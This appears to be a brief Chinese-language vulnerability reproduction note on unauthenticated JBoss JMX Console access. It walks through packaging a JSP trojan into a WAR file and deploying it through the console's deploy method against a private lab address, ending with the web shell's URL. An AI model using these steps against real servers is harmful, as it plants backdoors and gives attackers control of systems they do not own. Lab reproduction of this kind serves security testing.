JBoss JMX Console未授权访问Getshell

一、漏洞简介

二、漏洞影响

全版本

三、复现过程

先输入http://172.26.1.167:8080/jmx-console/null-console/进入到页面

image

创建一个war包

先准备好一个jsp的木马,然后打开cmd创建,输入命令:jar -cvf zfsn.war(你要创建war的名字,可随意填) zfsn. jsp

image

我们找到methodIndex为17 or 19的deploy,把远程的war包填入进去,进行远程war包的部署

image

部署完成之后,我们的木马地址为http://172.26.1.167/zfsn/zfsn.jsp

image